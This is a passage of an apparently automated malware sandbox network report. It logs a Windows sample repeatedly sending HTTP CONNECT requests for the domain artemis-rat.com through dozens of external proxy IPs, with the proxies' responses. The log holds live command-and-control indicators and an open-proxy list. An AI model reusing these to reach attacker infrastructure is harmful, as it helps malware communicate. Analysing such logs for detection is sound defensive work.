                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.663456917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:42.690346003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:54.694403887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:06.834965944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:30.835083961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              368192.168.2.451063164.92.237.188590457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.598203897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.256899118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              369192.168.2.45103443.231.22.228807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.614299059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.428725958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              370192.168.2.451077119.196.168.183807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.627772093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              371192.168.2.45109070.166.167.38577287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.632487059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              372192.168.2.451079121.159.146.251807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.640549898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              373192.168.2.45129943.153.64.664437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.640794039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              374192.168.2.45130143.153.64.664437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.642570019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              375192.168.2.45107631.43.158.10888887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.654197931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              376192.168.2.4510805.196.111.30200607284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.656641960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              377192.168.2.45110972.195.34.35273607284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.695244074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              378192.168.2.450338184.178.172.2341457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.696111917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              379192.168.2.451123146.19.106.191123347284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.696357965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              380192.168.2.451071103.200.135.22941457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.696926117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              381192.168.2.45105813.234.24.11610807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.697398901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.095025063 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              382192.168.2.45113238.162.25.6531287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.697774887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.347760916 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              383192.168.2.45113638.162.22.15631287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.698523998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.340850115 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              384192.168.2.4505908.209.255.1331287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.713660002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.754719973 CET38INHTTP/1.1 200 OK
                                              content-length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              385192.168.2.451102121.182.138.71807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.714796066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              386192.168.2.451133184.181.217.20141457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.724988937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              387192.168.2.45116423.19.244.10910807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.731976032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              388192.168.2.451091103.118.47.24380807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.739799976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              389192.168.2.451172162.243.102.20797647284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.744056940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              390192.168.2.450327213.136.79.177329307284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.746006966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.866370916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.960520029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.029721975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:43.053903103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:55.069319963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:07.131956100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:31.131841898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              391192.168.2.45112420.37.207.880807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.765707970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.078850031 CET72INHTTP/1.1 200 Connection established
                                              Proxy-Agent: Fortinet-Proxy/1.0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              392192.168.2.45113415.236.106.23631287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.767381907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.064676046 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              393192.168.2.451261185.162.228.154807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.797703981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.952155113 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              394192.168.2.450451104.236.0.129221677284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.798126936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.866415977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.960534096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              395192.168.2.451284104.25.114.28807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.798151970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.952265024 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              396192.168.2.451285104.17.132.79807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.798412085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.952429056 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              397192.168.2.45116998.162.25.2341457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.799873114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              398192.168.2.451149174.64.199.7941457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.800879955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              399192.168.2.45111995.47.119.12280807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.802536011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.190314054 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              400192.168.2.4511603.10.93.5031287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.804626942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
